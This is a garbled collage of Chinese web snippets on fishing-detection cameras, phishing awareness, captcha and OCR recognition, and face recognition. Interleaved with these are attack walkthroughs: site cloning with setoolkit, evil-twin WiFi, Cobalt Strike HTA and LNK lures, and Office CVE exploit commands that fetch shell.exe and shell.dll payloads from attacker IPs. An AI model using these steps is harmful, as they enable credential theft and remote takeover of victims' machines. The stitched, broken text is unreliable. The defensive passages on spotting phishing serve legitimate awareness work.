行为判别层构建空间规则:若“人”与“钓竿”距离<1米,且“人”位于水体边缘缓冲区内,持续>180秒,则标记为“疑似钓鱼”;排除干扰:行人路过(移动速度>0.5m/s)、摄影(三脚架+相机)等。 告警与通信层通过4G/5G将告警截图+30秒视频片段上传至渔政管理平台;原始视频在边缘设备完成分析后立即丢弃,不存储、不上传;符合《个人信息保护法》关于公共场所图像处理的规定。 注:在实验室模拟河岸场景(晴天、无遮挡、距离<30米)下,系统对持竿钓鱼行为的识别召回率达90.3%,误报率约5%(样本量:600段视频)。 2025年Q4在某省级湿地保护区实测中,因芦苇遮挡、远距离、水面反光等因素,有效检出率约为65%,误报率约12次/千小时(主要源于撑伞、自拍杆、树枝误判)。 河边钓鱼识别系统作为“数字护渔员”,虽不能杜绝违法行为,但可显著提升巡查效率。而这一切的前提,是清醒认知技术的边界——AI是眼睛的延伸,不是法律的执行者。
由此,我们可以总结出一种辨别钓鱼网站的方法: 二、识别方法——看域名 域名,也就是俗称的网址、地址。通常当我们打开一个网站的时候,域名会在浏览器标题栏下方,页面内容的上方显示。 .4.ultra.pub/,乍一看是不是很像是qq邮箱(mail.qq.com)的子页面? 我们看他的最后面,拿刚刚提到的这个钓鱼网站为例,它的域名是https://mail.qq.com.4.ultra.pub/,最高的两级域名(也就是最后的两小段)是ultra.pub,这显然是一个我没听说过的域名 sid=tJB23U0jkujnRGI_&r=62eeb0df76fca46f2e6f8fc63beb4ada 我们上面所提到的域名指的是从https://到下一个/中间的那一部分,即mail.qq.com ,这一段是域名,而不包括后面的部分,至于再往后面是什么,我们暂时不用管,只要按照上面的方法识别域名,就足够辨认出钓鱼网站。
三、钓鱼网站主要特点与识别方法通过综合分析钓鱼网站域名、网页内容特点,可以更准确地识别钓鱼网站,并采取相应防范措施保护个人信息和财产安全。 4.使用非常规顶级域名:使用不太常见的顶级域名(TLD),例如“.info”“.xyz”或“.biz”等,以降低被发现的概率。 4.定期关注最新钓鱼手法:网络钓鱼技术不断演变,攻击者会利用最新的热点事件和技术进行诈骗。关注网络安全新闻,了解当前流行的钓鱼技术,以快速识别潜在威胁。 (二)学习实用的钓鱼识别技巧1.不要随意点击来自陌生人邮件、社交媒体或者短信中的链接或附件。在访问网站前,仔细检查域名拼写,注意是否有额外的字母、数字或特殊符号。 4.定期更新系统和软件:确保操作系统、浏览器和其他常用软件均为最新版本,并进行安全更新。
java验证码识别--1 http://blog.csdn.net/problc/article/details/5794460 java验证码识别--2 http://blog.csdn.net/problc 4 http://blog.csdn.net/problc/article/details/5846614 java验证码识别--5 http://blog.csdn.net/problc/article 完整eclipse工程http://download.csdn.net/detail/problc/3829004 验证码识别如果识别率都是100%,那验证码也就没存在的必要了。 其实很多验证码能达到10%的识别率就不错了。 下面来一个稍微复杂一点的,识别率85%左右。 识别结果 啥也不说了,贴代码 public class ImagePreProcess4 { private static Map<BufferedImage, String> trainMap =
Tess4J是对Tesseract OCR API.的Java JNA 封装。使java能够通过调用Tess4J的API来使用Tesseract OCR。 TIFF,JPEG,GIF,PNG,BMP,JPEG,and PDF Tesseract 的github地址:https://github.com/tesseract-ocr/tesseract Tess4J 的github地址:https://github.com/nguyenq/tess4j Tess4J API 提供的功能: 1、直接识别支持的文件 2、识别图片流 3、识别图片的某块区域 4、将识别结果保存为 TEXT/ HOCR/ PDF/ UNLV/ BOX 5、通过设置取词的等级,提取识别出来的文字 6、获得每一个识别区域的具体坐标范围 7、调整倾斜的图片 8、裁剪图片 9、调整图片分辨率 10、从粘贴板获得图像 12、图片转换为二进制、黑白图像、灰度图像 13、反转图片颜色 demo.java: /** * Test of doOCR method, of class Tesseract. * 根据图片文件进行识别
减少成功的网络钓鱼交付。 在互联网规模工作。 最小化复杂性。
尽管当今互联网的安全措施已经很完善,但是还是会出现“被盗号”的情况,很多情况下是“有心人”的钓鱼网站导致的,今天的文章主要讲一下kali下使用setoolkit来制作钓鱼网站。 Java applet攻击 Metasploit浏览器攻击 钓鱼网站攻击 标签钓鱼攻击 网站jacking攻击 多种网站攻击 全屏幕攻击1234567 这里选择3,钓鱼网站攻击 ? 如果想克隆指定的页面的话,就选择2站点克隆,当然,这个功能虽然强大,但是有的网站是无法克隆的,如果无法克隆,就选择3,自己制作一样的网站去钓鱼。这里我详细讲一下站点克隆的方法。 总结 大家也可以看到,钓鱼网站的制作其实并不难,所以我们平常在访问一些常用的有账号登陆的地方一定要看清楚url,防止被钓鱼。
本文基于钓鱼攻击实战特征,围绕识别逻辑、检测模型、代码实现、处置流程与防御体系展开研究,严格遵循技术准确、逻辑严谨、论据闭环原则,聚焦可落地、可验证、可扩展的防御方案,为不同场景用户提供标准化参考。 UTHSC 安全提示明确指出,钓鱼信息通过情绪诱导促使用户未经思考执行操作,这一特征贯穿所有钓鱼场景,是识别攻击的关键依据。 3.2 文本语义与情感检测技术钓鱼文本具有强意图导向,语义与情感特征稳定,可通过 NLP 实现精准识别。 3.3 页面结构与 DOM 检测技术钓鱼页面为实现窃取目标,DOM 结构存在固定特征,可通过代码解析识别。 4 多维度钓鱼检测模型设计与代码实现4.1 模型整体架构本文构建四层检测模型:URL 特征层→文本语义层→DOM 结构层→行为上下文层,采用加权评分机制,输出风险等级与判定依据,支持规则动态更新与威胁情报联动
基于Bert进行实体识别任务微调 所需要的pip包 pandas numpy sklearn pytorch transformers: https://github.com/ import cuda device = 'cuda' if cuda.is_available() else 'cpu' print(device) cuda 数据处理 比赛数据下载地址:商品标题实体识别 I-4,I-4,I-4,B-4,I-4,I-4,B-29,I-29,I-29,I-29,I-29,I-29,B-9,I-9,B-5,I-5,B-40,I-40,B-4,I-4,B-40,I-40,B-5 I-4,I-4,B-14,I-14,B-5,I-5,B-4,I-... , 'I-4', 'I-4', 'B-14', 'I-8', 'B-5', 'I-5', 'B-4', 'I-4', 'B-7', 'I-7', 'B-4', 'I-4', 'I-4', 'B-11',
摘要本文基于KnowBe4平台近期发布的实证研究数据,结合认知负荷理论与人因安全模型,系统分析多任务工作状态对员工识别钓鱼邮件能力的负面影响。 近期,KnowBe4发布的一项研究指出,处于多任务处理(multitasking)状态的员工对钓鱼邮件的敏感度显著下降,点击率与凭证泄露风险明显上升。 本文旨在系统探讨多任务状态如何削弱员工对钓鱼邮件的识别能力,分析其背后的心理机制与组织诱因,并基于实证数据提出可操作的缓解措施。 KnowBe4(2025)的研究首次将该理论应用于钓鱼识别场景。 主要观测指标包括:钓鱼邮件打开率;恶意链接点击率;在仿冒页面输入凭证的比例;对异常信号的自评识别程度(事后问卷)。所有操作均在受控虚拟桌面环境中进行,确保无真实风险。
通过 kflash_gui 烧录人脸识别模型至 FLASH,Maix Bit 开发板上芯片K210跑人脸识别脚本,实现人脸识别。 一、实现步骤 具体操作步骤:MaixPy实现人脸识别 二、心得体会 刚开始以为只要把 key_gen_v1.2.bin 烧录进去,然后就可以跑脚本了。 MaixHub AIoT模型平台 模型是 KFPKG 文件,利用 kflash_gui 烧录至 Maix Bit ,然后在 MaixPy IDE 运行 MaixPy 人脸识别脚本就可以了。 a = img.draw_circle(re[0], re[1], 4) a = img.draw_circle(nose[0], nose[1], 4 ) a = img.draw_circle(lm[0], lm[1], 4) a = img.draw_circle(rm[0], rm[1], 4) #
/installer.sh --install 框架使用 Step 1:执行以下命令启动框架(笔者发现目前PyQt4已经不再支持了,所以这里借用之前师傅们的几张图片) sudo wifi-pumpkin Step 2:点击界面中的设置,设置钓鱼AP和密码,点击start即可开始 Step 3:点击start后我们可以看到钓鱼WiFi已经开启,连接钓鱼wifi在home界面可以看到当前连接的设备 apt install libssl-dev libffi-dev build-essential git clone https://github.com/P0cL4bs/wifipumpkin3.git AP Step 4:使用手机模拟连接 之后获取到相应的设备信息: 但是当访问web页面进行登录认证时发现并不是那么好,获取密码好像不太行: wifiphisher 框架介绍 Wifiphisher WiFi Step 4:之后选择攻击模式,第一个为固件升级,第二个为浏览器插件更新,第三个为登录认证页面 之后会出现两个AP: Step 4:用户链接AP 原来的AP无法正常链接: Step
当前网络钓鱼呈现AI化趋势,不法分子一方面能够高度仿冒银行、电商、机构等官方客服人员音色和语调,通过电话或语音消息诱导用户放松警惕,进而促使其访问精心伪装的钓鱼网站或泄露敏感信息;另一方面利用AI快速 、批量生成与真实界面高度相似的网站或APP交互页面,诱导用户点击页面,窃取用户重要数据(如社交动态、消费习惯、人际关系、账户信息等),网络钓鱼攻击的成功率和危害性大大增加。 此案暴露了关键防护难点,传统安全软件难以识别AI生成的动态二维码,该事件最终推动防护策略升级。 AI技术驱动的网络钓鱼已演变为全球性重大问题,近年来的典型案例揭示了其核心风险,攻击者通过深度伪造、实时交互及多模态合成技术持续突破传统防御边界。 作者:郭军 中国互联网络信息中心创新业务所编辑:芦笛(公共互联网反网络钓鱼工作组)
为提升监管效率,部分水利或城管部门试点部署了“河湖禁钓区钓鱼识别监测系统”。 需强调:AI无法判断“是否属于禁钓区”或“是否使用非法工具”,仅能对岸边可见的疑似钓鱼姿态与动作进行初判,包括:持杆静止:人员手持细长杆状物体,长时间面向水面;抛竿/收线动作:手臂有明显挥动或拉拽轨迹; 系统无法实现:区分“钓鱼”与“拍照自拍杆”“撑伞”“测量仪器”;识别水下网具、电鱼设备等非法捕捞工具;判定该区域是否属于法定禁钓区(需GIS地理围栏联动);二、系统架构:目标检测 + 动作建模 + 边缘推理系统采用三层边缘设计 告警与数据管理事件摘要(含时间、位置、截图)通过4G上传至河湖管理平台;原始视频在边缘端完成分析后立即丢弃,仅保留脱敏元数据,符合《个人信息保护法》及《湿地保护法》关于“最小必要”原则;不自动推送至执法终端 三、部署优势与现实约束黑光+变焦摄像机可覆盖50~150米岸线,提升单点效率;支持太阳能+4G,适用于无市电的偏远河段;局限性:夜间或雨雾天气下识别率大幅下降;无法识别水中作业或隐蔽捕捞行为;对“一人多竿
尽管官方IC3平台(www.ic3.gov)明确声明不收取费用、不索取银行信息,且仅使用.gov顶级域,但普通用户仍难以在搜索结果中准确识别真伪。 三、现有防御机制的局限性分析(一)浏览器安全提示不足现代浏览器虽能识别HTTPS与证书有效性,但无法判断网站内容是否合法。 四、多层次防御框架设计针对上述问题,本文提出“识别—验证—干预”三位一体防御框架。 )(二)浏览器扩展:页面哈希比对可开发轻量级Chrome扩展,在访问含“ic3”关键词的页面时自动比对DOM结构:// content.jsconst OFFICIAL_HASH = "a1b2c3d4e5 编辑:芦笛(公共互联网反网络钓鱼工作组)
钓鱼实践 Step 1:新增listener Step 2:选择"Attacks—>packages—>HTML application" Step 2:选择Powershell,之后点击"Generate " Step 3:保存载荷 Step 4:之后以邮件或者社交软件(例如:QQ、微信)的方式发送给第三方用户,并诱导其进行点击操作 PS:本来想使用ChatGPT来生成一段关于诱导用户点开evil.hta 文件的钓鱼话术,但是发现直接给我来了一个提示"非常抱歉,我作为一款AI语言模型,无法提供如此不当的建议和内容,因为这不仅是违反道德和伦理标准,也是违反法律和隐私规定的。 Step 5:成功返回会话 文末小结 本篇文章我们介绍了HTA钓鱼的基本流程,在实战中可以通过社交软件或者邮件的方式发送给受害者用户进行执行并获取权限
文章前言 LNK文件是一种用于指向其他文件的特殊文件,这些文件通常也被称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用, LNK钓鱼主要将图标伪装成正常图标,但是目标会执行Shell 命令 钓鱼实践 Step 1:点击Attacks—>Web Drive by—>Scripted Web Delivery,在弹出的对话框中将type类型设置为Powershell,然后单击launch '+ $file $Shortcut.Save() Step 4: 运行Al1ex.ps1,之后生成LNK文件 Step 5:后将Al1ex.lnk发送给受害者,诱导用户运行 Step 6:之后成功获得Shell 文末小结 基于LNK文件的钓鱼方式总体而言利用难度相对有点大 ,一般都需要通过钓鱼邮件的方式(例如:投递压缩包并附加Link文件)进行利用,不过作为一种后渗透阶段权限维持的方式也还是挺不错的,但是就得看点击率了~
Tesseract-OCR支持中文识别,并且开源和提供全套的训练工具,是快速低成本开发的首选。 Tess4J在英文和数字识别中性能比较好,但是在中文识别中,无论速度还是识别率还是较弱,因此需要针对场景进行训练,才能获得较好结果。 这篇博客简单记录一下在java中通过调用tess4j的方式识别图片的文字内容。 ,需要指定识别语种,并且需要将对应的语言包放进项目中 instance.setLanguage("chi_sim"); // 指定识别图片 : 可以看到,tess4j在中文识别时,无论速度还是识别率还是较弱,需要针对场景进行训练,才能获得较好结果。
本篇博文是Python+OpenCV实现AI人脸识别身份认证系统的收官之作,在人脸识别原理到数据采集、存储和训练识别模型基础上,实现人脸识别,废话少说,上效果图: ? 案例引入 在Python+OpenCV实现AI人脸识别身份认证系统(3)——训练人脸识别模型中主要讲述神经网络模型的训练过程,使用OpenCV模块中的LBPH(LOCAL BINARY PATTERNS HISTOGRAMS)人脸识别器算法(cv2.face.LBPHFaceRecogni zer_create()方法实现),训练生成“.yml”后缀的模型文件。 人脸识别的过程也非常简单,通过使用OpenCV模块读取“.yml”后缀的识别模型文件,实现人脸识别。 示例代码如下所示:
python cve-2017-8759_toolkit.py -M exp -e http://192.168.174.131/shell.exe -l/root/shell.exe Step 4: tree/master/Windows%20Office/CVE-2018-0802 Step 2:打开MSF设置攻击IP,准备接受反弹shell Step 3:执行exploit进行监听 Step 4: exploit.py generate test/calc.dll http://<SRV IP> Step 2:启动服务托管载荷 python3 exploit.py host 80 Step 4: :执行以下命令生成恶意载荷并更新用于托管载荷的地址信息 python3 exploit.py generate test/shell.dll http://192.168.174.128 Step 4: ,从上面可以发现在Office钓鱼中大部分情况都需要用户进行交互,例如:点击启用宏或者更新数据文档,这无疑会增加用户的怀疑,在社工钓鱼中药特别注意